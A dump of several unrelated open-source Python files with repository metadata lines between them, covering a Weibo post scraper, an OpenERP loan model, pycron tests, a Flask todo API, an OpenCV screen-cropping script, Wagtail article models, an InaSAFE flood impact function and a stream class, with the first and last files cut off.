print(u'视频封面:' + video_items[2])
try:
filename = download_pic(video_items[2], '.jpg')
except:
print(u'下载视频封面出错:' + video_items[2])
filename = None
video_items = list(video_items)
video_items.append(filename)
return video_items
def depart_quotation(story):
quotation_block = None
if story.__contains__('class="replyBox"'):
if story.__contains__('class="noMSource"'):#原文已被作者删除的情况
pattern = re.compile(r'(<div class="replyBox".*?<div class="noMSource".*?</div>.*?</div>)', re.S)
quotation_block = re.findall(pattern, story)[0]
else:
pattern = re.compile(r'(<div class="replyBox".*?<div class="msgBox".*?title=".*?" gender=' +
'.*?<div class="pubInfo.*?from="\\d*">.*?</a>.*?</div>.*?</div>)', re.S)
quotation_block = re.findall(pattern, story)[0]
story = story.replace(quotation_block, '')
return story, quotation_block
def analyze_quotation(quotation):
quotation_items = []
if quotation.__contains__('class="noMSource"'):
quotation_items = [u'原文已经被作者删除。']
return quotation_items
pattern = re.compile(r'<div class="msgCnt".*?title="(.*?)" gender=' +
'.*?<div>(.*?)</div>' +
'.*?<div class="pubInfo.*?from="\\d*">(.*?)</a>', re.S)
quotation_items = re.findall(pattern, quotation)[0]
print('原帖作者:', quotation_items[0])
print('原帖内容:', quotation_items[1])
print('原帖时间:', quotation_items[2])
return quotation_items
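# --- Hedged usage sketch (not part of the original module) ---
# A minimal illustration of how the helpers above are combined into a .docx
# file. Document comes from python-docx (the same package that provides the
# docx.shared imports above); the author name, timestamp and the plain-text
# snippet are made-up placeholders rather than real weibo markup.
def _build_example_doc(path='example.docx'):
    from docx import Document
    document = Document()
    add_author(document, u'example_author')
    add_content(document, u'Hello from a sample post')
    add_time(document, u'2017-12-21 10:00')
    document.save(path)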
|
apache-2.0
| -2,133,465,114,962,808,600
| 38.012739
| 118
| 0.580292
| false
| 3.196503
| false
| false
| false
|
morrillo/hr_loans
|
hr.py
|
1
|
1465
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class hr_loan(osv.osv):
_name = 'hr.loan'
_description = 'HR Loan'
_columns = {
'employee_id': fields.many2one('hr.employee','id','Employee ID'),
'loan_type': fields.selection((('P','Payment Advance'),
('L','Loan')),'Loan Type'),
'loan_date': fields.date('Loan Date'),
'comment': fields.text('Additional Information'),
}
hr_loan()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
| -1,966,382,299,273,435,600
| 37.552632
| 78
| 0.604778
| false
| 4.035813
| false
| false
| false
|
kipe/pycron
|
tests/test_minute.py
|
1
|
3235
|
from datetime import datetime
import pycron
from pytz import utc
import pendulum
import arrow
import udatetime
from delorean import Delorean
def test_minute():
def run(now):
assert pycron.is_now('* * * * *', now)
assert pycron.is_now('9 * * * *', now)
assert pycron.is_now('*/1 * * * *', now)
assert pycron.is_now('*/3 * * * *', now)
assert pycron.is_now('*/9 * * * *', now)
assert pycron.is_now('3,9,25,16 * * * *', now)
assert pycron.is_now('*/2 * * * *', now) is False
assert pycron.is_now('*/4 * * * *', now) is False
assert pycron.is_now('*/5 * * * *', now) is False
assert pycron.is_now('*/12 * * * *', now) is False
assert pycron.is_now('3,25,16 * * * *', now) is False
assert pycron.is_now('0-10 * * * *', now)
assert pycron.is_now('0-10 0-10 * * *', now)
assert pycron.is_now('10-20 * * * *', now) is False
assert pycron.is_now('10-20 10-20 * * *', now) is False
assert pycron.is_now('1,2,5-10 * * * *', now)
assert pycron.is_now('9,5-8 * * * *', now)
assert pycron.is_now('10,20-30 * * * *', now) is False
# Issue 14
assert pycron.is_now('1-59/2 * * * *', now) is True
assert pycron.is_now('1-59/4 * * * *', now) is True
assert pycron.is_now('1-59/8 * * * *', now) is True
now = datetime(2015, 6, 18, 0, 9)
run(now)
run(now.replace(tzinfo=utc))
run(pendulum.instance(now))
run(arrow.get(now))
run(udatetime.from_string(now.isoformat()))
run(Delorean(datetime=now, timezone='UTC').datetime)
def test_last_minute():
def run(now):
assert pycron.is_now('* * * * *', now)
assert pycron.is_now('59 * * * *', now)
assert pycron.is_now('*/1 * * * *', now)
# Issue 14
assert pycron.is_now('1-59/2 * * * *', now) is True
now = datetime(2015, 6, 18, 0, 59)
run(now)
run(now.replace(tzinfo=utc))
run(pendulum.instance(now))
run(arrow.get(now))
run(udatetime.from_string(now.isoformat()))
run(Delorean(datetime=now, timezone='UTC').datetime)
def test_minute_ranges():
for i in range(1, 59, 2):
now = datetime(2015, 6, 18, 0, i)
assert pycron.is_now('1-59/2 * * * *', now)
assert pycron.is_now('1-59/2 * * * *', now.replace(tzinfo=utc))
assert pycron.is_now('1-59/2 * * * *', pendulum.instance(now))
assert pycron.is_now('1-59/2 * * * *', arrow.get(now))
assert pycron.is_now('1-59/2 * * * *', udatetime.from_string(now.isoformat()))
assert pycron.is_now('1-59/2 * * * *', Delorean(datetime=now, timezone='UTC').datetime)
for i in range(0, 59, 2):
now = datetime(2015, 6, 18, 0, i)
assert pycron.is_now('1-59/2 * * * *', now) is False
assert pycron.is_now('1-59/2 * * * *', now.replace(tzinfo=utc)) is False
assert pycron.is_now('1-59/2 * * * *', pendulum.instance(now)) is False
assert pycron.is_now('1-59/2 * * * *', arrow.get(now)) is False
assert pycron.is_now('1-59/2 * * * *', udatetime.from_string(now.isoformat())) is False
assert pycron.is_now('1-59/2 * * * *', Delorean(datetime=now, timezone='UTC').datetime) is False
|
mit
| 4,184,455,455,338,272,000
| 39.949367
| 104
| 0.550541
| false
| 2.917042
| false
| false
| false
|
chrisng93/todo-app
|
server/app/api/lists.py
|
1
|
1669
|
from flask import Blueprint, request, jsonify
from sqlalchemy.exc import IntegrityError
from ..models.List import List
from ..extensions import db
list_api = Blueprint('list', __name__, url_prefix='/api/list')
@list_api.route('/', methods=['GET'])
def get_lists():
lists = List.query
return jsonify({'lists': [todo_list.to_json() for todo_list in lists]})
@list_api.route('/<int:id>', methods=['GET'])
def get_list(id):
todo_list = List.query.get_or_404(id)
return jsonify({'list': todo_list.to_json()})
@list_api.route('/', methods=['POST'])
def create_list():
try:
todo_list = List().from_json(request.json)
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()}), 201
except IntegrityError as e:
return jsonify({'message': str(e)}), 400
@list_api.route('/<int:id>', methods=['PUT'])
def update_list(id):
try:
todo_list = List.query.get_or_404(id)
todo_list.from_json(request.json)
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()})
except IntegrityError as e:
return jsonify({'message': str(e)}), 400
@list_api.route('/<int:id>', methods=['DELETE'])
def delete_list(id):
todo_list = List.query.get_or_404(id)
db.session.delete(todo_list)
db.session.commit()
return jsonify({})
@list_api.route('/<int:id>/complete', methods=['PUT'])
def mark_all_complete(id):
todo_list = List.query.get_or_404(id)
todo_list.mark_all_complete()
db.session.add(todo_list)
db.session.commit()
return jsonify({'list': todo_list.to_json()})
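# --- Hedged usage sketch (not part of the original module) ---
# The blueprint above only declares routes; it still needs to be registered
# on a Flask app that also initialises the shared SQLAlchemy handle. The
# factory below is a guess at that wiring (the real version lives elsewhere
# in this project) and the sqlite URI is a placeholder.
def _create_example_app():
    from flask import Flask
    app = Flask(__name__)
    app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///todo.db'
    db.init_app(app)
    app.register_blueprint(list_api)   # endpoints served under /api/list
    return app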
|
mit
| 5,324,590,652,803,928,000
| 27.288136
| 75
| 0.630917
| false
| 3.272549
| false
| false
| false
|
meizhoubao/pyimagesearch
|
Pokedex/find_screen.py
|
1
|
2248
|
from pyimagesearch import imutils
from skimage import exposure
import numpy as np
import argparse
import cv2
ap = argparse.ArgumentParser()
ap.add_argument("-q", "--query", required=True,
help = "Path to the query image")
args = vars(ap.parse_args())
image = cv2.imread(args["query"])
ratio = image.shape[0] / 300.0
orig = image.copy()
# Resize for faster edge/contour detection; `ratio` maps results back to the original image.
image = imutils.resize(image, height = 300)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# Smooth while preserving edges, then extract edges for contour detection.
gray = cv2.bilateralFilter(gray, 11, 17, 17)
edged = cv2.Canny(gray, 30, 200)
# Keep the ten largest contours and look for the first quadrilateral (the screen outline).
(cnts, _) = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = sorted(cnts, key=cv2.contourArea, reverse=True)[:10]
screenCnt = None
for c in cnts:
peri = cv2.arcLength(c, True)
approx = cv2.approxPolyDP(c, 0.02 * peri, True)
if len(approx) == 4:
screenCnt = approx
break
# cv2.drawContours(image, [ScreenCnt], -1, (0, 255, 0), 3)
# cv2.imshow("Game Boy Screen", image)
# cv2.waitKey(0)
pts = screenCnt.reshape(4, 2)
rect = np.zeros((4,2), dtype = "float32")
s = pts.sum(axis=1)
rect[0] = pts[np.argmin(s)]
rect[2] = pts[np.argmax(s)]
diff = np.diff(pts, axis=1)
rect[1] = pts[np.argmin(diff)]
rect[3] = pts[np.argmax(diff)]
rect *= ratio
(tl, tr, br, bl) = rect
widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))
widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))
heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))
heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))
maxWidth = max(int(widthA), int(widthB))
maxHeight = max(int(heightA), int(heightB))
dst = np.array([
[0,0],
[maxWidth - 1, 0],
[maxWidth - 1, maxHeight - 1],
[0, maxHeight - 1]
], dtype = "float32")
M = cv2.getPerspectiveTransform(rect, dst)
wrap = cv2.warpPerspective(orig, M, (maxWidth, maxHeight))
wrap = cv2.cvtColor(wrap, cv2.COLOR_BGR2GRAY)
wrap = exposure.rescale_intensity(wrap, out_range = (0, 255))
(h, w) = wrap.shape
(dX, dY) = (int(w * 0.4), int(h * 0.4))
crop = wrap[10:dY, w - dX:w - 10]
cv2.imwrite("cropped.png", crop)
cv2.imshow("image", image)
cv2.imshow("edge", edged)
cv2.imshow("wrap", imutils.resize(wrap, height = 300))
cv2.imshow("crop", imutils.resize(crop, height = 300))
cv2.waitKey(0)
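# --- Hedged note (not part of the original script) ---
# The sum/diff trick used above orders the four detected corners as
# top-left, top-right, bottom-right, bottom-left. The helper below repeats
# the same logic on a made-up quadrilateral so the ordering is easy to verify
# by hand; it is illustration only and is never called by the script.
def _order_points_example():
    pts = np.array([[50, 5], [5, 8], [8, 90], [55, 95]], dtype="float32")
    rect = np.zeros((4, 2), dtype="float32")
    s = pts.sum(axis=1)
    rect[0] = pts[np.argmin(s)]    # top-left: smallest x + y       -> (5, 8)
    rect[2] = pts[np.argmax(s)]    # bottom-right: largest x + y    -> (55, 95)
    d = np.diff(pts, axis=1)       # y - x for each point
    rect[1] = pts[np.argmin(d)]    # top-right: most negative y - x -> (50, 5)
    rect[3] = pts[np.argmax(d)]    # bottom-left: most positive y - x -> (8, 90)
    return rect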
|
gpl-3.0
| -7,678,565,435,378,642,000
| 27.455696
| 82
| 0.626335
| false
| 2.414608
| false
| false
| false
|
jeremy-c/unusualbusiness
|
unusualbusiness/articles/models.py
|
1
|
13076
|
from __future__ import unicode_literals
from django.db import models
from django.db.models import Model
from django.utils import timezone
from django.utils.translation import ugettext as _
from modelcluster.fields import ParentalKey
from taggit.models import TaggedItemBase, CommonGenericTaggedItemBase, GenericUUIDTaggedItemBase, Tag
from wagtail.wagtailadmin.edit_handlers import FieldPanel, InlinePanel, PageChooserPanel, StreamFieldPanel
from wagtail.wagtailcore import blocks
from wagtail.wagtailcore.fields import StreamField
from wagtail.wagtailcore.models import Page, Orderable
from wagtail.wagtailembeds.blocks import EmbedBlock
from wagtail.wagtailimages.blocks import ImageChooserBlock
from wagtail.wagtailimages.edit_handlers import ImageChooserPanel
from wagtail.wagtailsearch import index
from unusualbusiness.events.models import EventPage
from unusualbusiness.organizations.models import OrganizationPage
from unusualbusiness.utils.models import PageFormat, RenderInlineMixin, RelatedHowToMixin, FeaturedImageBlock, \
FeaturedVideoBlock, FeaturedAudioBlock, PullQuoteBlock
class TheoryArticleIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.TheoryArticlePage']
def get_context(self, request):
context = super(TheoryArticleIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['theory_articles'] = TheoryArticlePage.objects.all().live().order_by('-publication_date')
context['parent'] = self.get_parent().specific
return context
class StoryArticleIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.StoryArticlePage']
def get_context(self, request):
context = super(StoryArticleIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['story_articles'] = StoryArticlePage.objects.all().live().order_by('-publication_date')
return context
class ActivityIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['events.EventPage', 'articles.NewsArticlePage', ]
@staticmethod
def featured_articles():
event_list = EventPage.objects.live().filter(is_featured=True)
return sorted(event_list,
key=lambda instance: instance.first_published_at,
reverse=True)
def get_context(self, request):
context = super(ActivityIndexPage, self).get_context(request)
context['events'] = EventPage.objects.live().order_by('start_date')
context['initial_slide'] = EventPage.objects.live().count() - 1
context['news_articles'] = NewsArticlePage.objects.child_of(self).live().order_by('-publication_date')
return context
class AbstractArticle(models.Model, RenderInlineMixin):
is_featured = models.BooleanField(
verbose_name = _("Is Featured on home page"),
default=False
)
subtitle = models.CharField(
verbose_name=_('subtitle'),
max_length=255,
help_text=_("The subtitle of the page"),
blank=True
)
featured = StreamField([
('featured_image', FeaturedImageBlock()),
('featured_video', FeaturedVideoBlock()),
('featured_audio', FeaturedAudioBlock()),
])
author = models.ForeignKey(
'articles.AuthorPage',
verbose_name=_('author'),
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='+'
)
publication_date = models.DateField(
verbose_name=_('publication_date'),
help_text=_("The publication date of the article"),
default=timezone.now,
blank=True,
null=True,
)
body = StreamField([
('introduction', blocks.TextBlock(icon="italic", rows=3)),
('paragraph', blocks.RichTextBlock(icon="pilcrow")),
# ('markdown_paragraph', MarkdownBlock(icon="code")),
('image', ImageChooserBlock(icon="image")),
('pullquote', PullQuoteBlock()),
])
class Meta:
abstract = True
verbose_name = _("Article")
def __featured_item(self, block_type='featured_image'):
for stream_child in self.featured:
if stream_child.block_type == block_type:
return stream_child
return None
@property
def featured_image(self):
return self.__featured_item('featured_image')
@property
def featured_audio(self):
return self.__featured_item('featured_audio')
@property
def featured_video(self):
return self.__featured_item('featured_video')
@property
def introduction(self):
for stream_child in self.body:
if stream_child.block_type == 'introduction':
return stream_child.value
return None
class StoryArticlePage(Page, AbstractArticle, RelatedHowToMixin):
parent_page_types = ['articles.StoryArticleIndexPage']
subpage_types = []
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='text',
choices=(PageFormat.TEXT,
PageFormat.AUDIO,
PageFormat.VIDEO,
PageFormat.IMAGES, ))
class Meta:
verbose_name = _("Story")
verbose_name_plural = _("Stories")
def related_organizations(self):
return [related_organization.organization_page
for related_organization
in self.organizations.select_related().all()]
def get_context(self, request):
context = super(StoryArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_story_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
StoryArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
FieldPanel('publication_date'),
StreamFieldPanel('featured'),
StreamFieldPanel('body'),
InlinePanel('organizations', label=_("Organizations")),
]
StoryArticlePage.promote_panels = Page.promote_panels
StoryArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('organizations', [
index.SearchField('title'),
]),
index.RelatedFields('how_to_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class StoryArticlePageOrganization(Orderable, models.Model):
story_article_page = ParentalKey('articles.StoryArticlePage', related_name='organizations')
organization_page = models.ForeignKey(
'organizations.OrganizationPage',
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='story_article_page'
)
panels = [
PageChooserPanel('organization_page'),
]
def __str__(self): # __unicode__ on Python 2
return self.story_article_page.title + " -> " + self.organization_page.title
class TheoryArticlePage(Page, AbstractArticle, RelatedHowToMixin):
ajax_template = 'articles/blocks/inline_theory_article.html'
parent_page_types = ['articles.TheoryArticleIndexPage']
subpage_types = []
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='theory',
choices=(PageFormat.THEORY,
PageFormat.AUDIO,
PageFormat.VIDEO,
PageFormat.LINK,
PageFormat.DOCUMENT, ))
class Meta:
verbose_name = _("Theory")
verbose_name_plural = _("Theories")
def get_context(self, request):
context = super(TheoryArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_theory_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
TheoryArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
StreamFieldPanel('featured'),
FieldPanel('publication_date'),
StreamFieldPanel('body'),
]
TheoryArticlePage.promote_panels = Page.promote_panels
TheoryArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('how_to_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class NewsArticlePage(Page, AbstractArticle, RelatedHowToMixin):
event_page = models.ForeignKey(
'events.EventPage',
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='news_article_page'
)
format = models.CharField(
verbose_name=_('page_format'),
max_length=32,
null=False,
default='event',
choices=(PageFormat.EVENT,
PageFormat.IMAGES,
PageFormat.AUDIO,
PageFormat.VIDEO, ))
parent_page_types = ['events.EventPage', 'articles.ActivityIndexPage']
subpage_types = []
class Meta:
verbose_name = _("News or report article")
verbose_name_plural = _("News or report articles")
def get_context(self, request):
context = super(NewsArticlePage, self).get_context(request)
related_how_tos = self.related_how_tos()
context['related_how_tos'] = related_how_tos
context['upcoming_related_event'] = self.upcoming_related_event(related_how_tos)
context['related_how_tos_with_articles'] = self.related_how_to_news_articles(related_how_tos, self.id)
context['parent'] = self.get_parent().specific
return context
NewsArticlePage.content_panels = Page.content_panels + [
FieldPanel('is_featured'),
PageChooserPanel('event_page', page_type='events.EventPage'),
FieldPanel('subtitle'),
PageChooserPanel('author', page_type='articles.AuthorPage'),
FieldPanel('format'),
StreamFieldPanel('featured'),
FieldPanel('publication_date'),
StreamFieldPanel('body'),
]
NewsArticlePage.promote_panels = Page.promote_panels
NewsArticlePage.search_fields = Page.search_fields + [
index.SearchField('title_en'),
index.SearchField('title_nl'),
index.SearchField('subtitle_en'),
index.SearchField('subtitle_nl'),
index.SearchField('body_en'),
index.SearchField('body_nl'),
index.RelatedFields('event_page', [
index.SearchField('title'),
]),
index.RelatedFields('author', [
index.SearchField('title'),
]),
]
class AuthorPage(Page):
photo = models.ForeignKey(
'wagtailimages.Image',
verbose_name=_('photo'),
null=True,
blank=True,
on_delete=models.SET_NULL,
related_name='+'
)
biography = models.TextField(
verbose_name=_('biography'),
help_text=_("The biography of the author (max. 150 woorden)"),
blank=True
)
parent_page_types = ['articles.AuthorIndexPage']
subpage_types = []
class Meta:
verbose_name = _("Author")
verbose_name_plural = _("Authors")
AuthorPage.content_panels = Page.content_panels + [
FieldPanel('biography'),
ImageChooserPanel('photo'),
]
AuthorPage.promote_panels = Page.promote_panels
class AuthorIndexPage(Page):
parent_page_types = ['pages.HomePage']
subpage_types = ['articles.AuthorPage']
def get_context(self, request):
context = super(AuthorIndexPage, self).get_context(request)
# Add extra variables and return the updated context
context['authors'] = AuthorPage.objects.all().live()
context['parent'] = self.get_parent().specific
return context
|
bsd-3-clause
| 738,842,656,338,968,400
| 32.875648
| 112
| 0.643698
| false
| 4.08625
| false
| false
| false
|
Samweli/inasafe
|
safe/impact_functions/inundation/flood_raster_population/impact_function.py
|
1
|
8986
|
# coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Flood Raster Impact Function
on Population.
Contact : ole.moller.nielsen@gmail.com
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Rizky Maulana Nugraha'
import logging
import numpy
from safe.impact_functions.core import (
population_rounding,
has_no_data)
from safe.impact_functions.impact_function_manager \
import ImpactFunctionManager
from safe.impact_functions.inundation.flood_raster_population\
.metadata_definitions import FloodEvacuationRasterHazardMetadata
from safe.impact_functions.bases.continuous_rh_continuous_re import \
ContinuousRHContinuousRE
from safe.utilities.i18n import tr
from safe.impact_functions.core import no_population_impact_message
from safe.common.exceptions import ZeroImpactException
from safe.storage.raster import Raster
from safe.common.utilities import (
format_int,
create_classes,
humanize_class,
create_label,
verify)
from safe.gui.tools.minimum_needs.needs_profile import add_needs_parameters, \
get_needs_provenance_value
from safe.impact_reports.population_exposure_report_mixin import \
PopulationExposureReportMixin
from safe.definitions import no_data_warning
import safe.messaging as m
LOGGER = logging.getLogger('InaSAFE')
class FloodEvacuationRasterHazardFunction(
ContinuousRHContinuousRE,
PopulationExposureReportMixin):
# noinspection PyUnresolvedReferences
"""Risk plugin for flood population evacuation."""
_metadata = FloodEvacuationRasterHazardMetadata()
def __init__(self):
"""Constructor."""
super(FloodEvacuationRasterHazardFunction, self).__init__()
PopulationExposureReportMixin.__init__(self)
self.impact_function_manager = ImpactFunctionManager()
# AG: Use the proper minimum needs, update the parameters
self.parameters = add_needs_parameters(self.parameters)
# Initialize instance attributes for readability (pylint)
self.no_data_warning = False
def notes(self):
"""Return the notes section of the report.
:return: The notes that should be attached to this impact report.
:rtype: list
"""
population = format_int(population_rounding(self.total_population))
thresholds = self.parameters['thresholds'].value
if get_needs_provenance_value(self.parameters) is None:
needs_provenance = ''
else:
needs_provenance = tr(get_needs_provenance_value(self.parameters))
fields = [
tr('Total population in the analysis area: %s') % population,
tr('<sup>1</sup>People need evacuation if flood levels exceed '
'%(eps).1f m.') % {'eps': thresholds[-1]},
needs_provenance,
]
if self.no_data_warning:
fields = fields + no_data_warning
# include any generic exposure specific notes from definitions.py
fields = fields + self.exposure_notes()
# include any generic hazard specific notes from definitions.py
fields = fields + self.hazard_notes()
return fields
def _tabulate_zero_impact(self):
thresholds = self.parameters['thresholds'].value
message = m.Message()
table = m.Table(
style_class='table table-condensed table-striped')
row = m.Row()
label = m.ImportantText(
tr('People in %.1f m of water') % thresholds[-1])
content = '%s' % format_int(self.total_evacuated)
row.add(m.Cell(label))
row.add(m.Cell(content))
table.add(row)
table.caption = self.question
message.add(table)
message = message.to_html(suppress_newlines=True)
return message
def run(self):
"""Risk plugin for flood population evacuation.
Counts number of people exposed to flood levels exceeding
specified threshold.
:returns: Map of population exposed to flood levels exceeding the
threshold. Table with number of people evacuated and supplies
required.
:rtype: tuple
"""
# Determine depths above which people are regarded affected [m]
# Use thresholds from inundation layer if specified
thresholds = self.parameters['thresholds'].value
verify(
isinstance(thresholds, list),
'Expected thresholds to be a list. Got %s' % str(thresholds))
# Extract data as numeric arrays
data = self.hazard.layer.get_data(nan=True) # Depth
if has_no_data(data):
self.no_data_warning = True
# Calculate impact as population exposed to depths > max threshold
population = self.exposure.layer.get_data(nan=True, scaling=True)
total = int(numpy.nansum(population))
if has_no_data(population):
self.no_data_warning = True
# merely initialize
impact = None
for i, lo in enumerate(thresholds):
if i == len(thresholds) - 1:
# The last threshold
thresholds_name = tr(
'People in >= %.1f m of water') % lo
self.impact_category_ordering.append(thresholds_name)
self._evacuation_category = thresholds_name
impact = medium = numpy.where(data >= lo, population, 0)
else:
# Intermediate thresholds
hi = thresholds[i + 1]
thresholds_name = tr(
'People in %.1f m to %.1f m of water' % (lo, hi))
self.impact_category_ordering.append(thresholds_name)
medium = numpy.where((data >= lo) * (data < hi), population, 0)
# Count
val = int(numpy.nansum(medium))
self.affected_population[thresholds_name] = val
# Put the deepest area in top #2385
self.impact_category_ordering.reverse()
self.total_population = total
self.unaffected_population = total - self.total_affected_population
# Carry the no data values forward to the impact layer.
impact = numpy.where(numpy.isnan(population), numpy.nan, impact)
impact = numpy.where(numpy.isnan(data), numpy.nan, impact)
# Count totals
evacuated = self.total_evacuated
self.minimum_needs = [
parameter.serialize() for parameter in
self.parameters['minimum needs']
]
total_needs = self.total_needs
# check for zero impact
if numpy.nanmax(impact) == 0 == numpy.nanmin(impact):
message = no_population_impact_message(self.question)
raise ZeroImpactException(message)
# Create style
colours = [
'#FFFFFF', '#38A800', '#79C900', '#CEED00',
'#FFCC00', '#FF6600', '#FF0000', '#7A0000']
classes = create_classes(impact.flat[:], len(colours))
interval_classes = humanize_class(classes)
style_classes = []
for i in xrange(len(colours)):
style_class = dict()
if i == 1:
label = create_label(interval_classes[i], 'Low')
elif i == 4:
label = create_label(interval_classes[i], 'Medium')
elif i == 7:
label = create_label(interval_classes[i], 'High')
else:
label = create_label(interval_classes[i])
style_class['label'] = label
style_class['quantity'] = classes[i]
style_class['transparency'] = 0
style_class['colour'] = colours[i]
style_classes.append(style_class)
style_info = dict(
target_field=None,
style_classes=style_classes,
style_type='rasterStyle')
impact_data = self.generate_data()
extra_keywords = {
'map_title': self.map_title(),
'legend_notes': self.metadata().key('legend_notes'),
'legend_units': self.metadata().key('legend_units'),
'legend_title': self.metadata().key('legend_title'),
'evacuated': evacuated,
'total_needs': total_needs
}
impact_layer_keywords = self.generate_impact_keywords(extra_keywords)
# Create raster object and return
impact_layer = Raster(
impact,
projection=self.hazard.layer.get_projection(),
geotransform=self.hazard.layer.get_geotransform(),
name=self.metadata().key('layer_name'),
keywords=impact_layer_keywords,
style_info=style_info)
impact_layer.impact_data = impact_data
self._impact = impact_layer
return impact_layer
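# Minimal numpy-only sketch of the threshold binning used in run() above
# (made-up depth and population values, not InaSAFE layers):
def _threshold_binning_example():
    import numpy
    depth = numpy.array([0.5, 1.5, 2.5])
    people = numpy.array([10, 20, 30])
    lo, hi = 1.0, 2.0
    # people are counted only where lo <= depth < hi, giving array([ 0, 20,  0])
    return numpy.where((depth >= lo) * (depth < hi), people, 0)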
|
gpl-3.0
| -2,536,155,877,016,420,000
| 35.677551
| 79
| 0.620632
| false
| 4.154415
| false
| false
| false
|
Joev-/Streaman
|
streaman/stream.py
|
1
|
3561
|
"""
streaman.stream
---------------
Provides the base `Stream` and `Channel` classes which must be overridden by
implemented services.
"""
import time
import os
try:
import cPickle as pickle
except ImportError:
import pickle
from types import MethodType
from streaman.common import *
class Stream(object):
""" A raw `Stream` object. Stores a Name, URI and Service ID for a stream. """
def __init__(self, service, name, uri, url):
self.service = service
self.name = name
self.uri = uri
self.url = url
self.status = STATUS_OFFLINE
self.last_update = int(time.time())
def __repr__(self):
return "<Stream: ({0}) {1}>".format(SERVICE_NAME[self.service], self.name)
def __getstate__(self):
"""
Overridden for pickling purposes. Only the attributes
of the underlying `Stream` class need to be pickled.
"""
to_pickle = ["service", "name", "uri", "url"]
d = dict()
for k, v in self.__dict__.items():
if k in to_pickle:
d[k]=v
return d
def __setstate__(self, d):
"""
Overridden for pickling purposes.
Initialises null values for attributes that should exist.
"""
d["channel"] = None
d["status"] = STATUS_OFFLINE
d["last_update"] = 0
# Most streams will have some sort of game attribute.
d["game"] = ""
self.__dict__.update(d)
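# Hedged illustration of the pickling round trip above: dumps() keeps only
# service, name, uri and url, and loads() re-seeds channel, status, last_update
# and game with defaults, so a restored Stream starts as STATUS_OFFLINE until
# its status is checked again.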
def update(self, updateModel, index):
"""
This method should be used to update the Stream with new data.
At the least it informs the model that the data at the given index
has been updated. The updateModel method is a method inside the
Model class, usually `notify_stream_updated`
"""
updateModel(index)
self.last_update = int(time.time())
@staticmethod
def generate_uri(stream_name):
"""
Takes a stream name and returns a URI.
Must be overridden and implemented for each streaming service.
"""
raise NotImplementedError("Method must be overridden")
@staticmethod
def generate_url(stream_name):
"""
Takes a stream name and returns a URL.
Must be overridden and implemented for each streaming service.
A URL differs from a URI in that it is the hyperlink to the stream web page.
This will be used when users click on the "View on [service]" button.
"""
raise NotImplementedError("Method must be overridden")
@staticmethod
def is_valid(stream_uri):
"""
Ensures a `Stream` is valid on the service.
Must be overridden and implemented correctly for each streaming service.
"""
raise NotImplementedError("Method must be overridden")
def get_icon(self):
""" Returns a valid resource URI for to an icon. Must be overridden."""
raise NotImplementedError("Method must be overridden")
@property
def online(self):
return self.status
def update_status(self, status):
self.status = status
def check_status(self):
""" Uses `self.uri` to check the status of the stream. """
pass
class Channel(object):
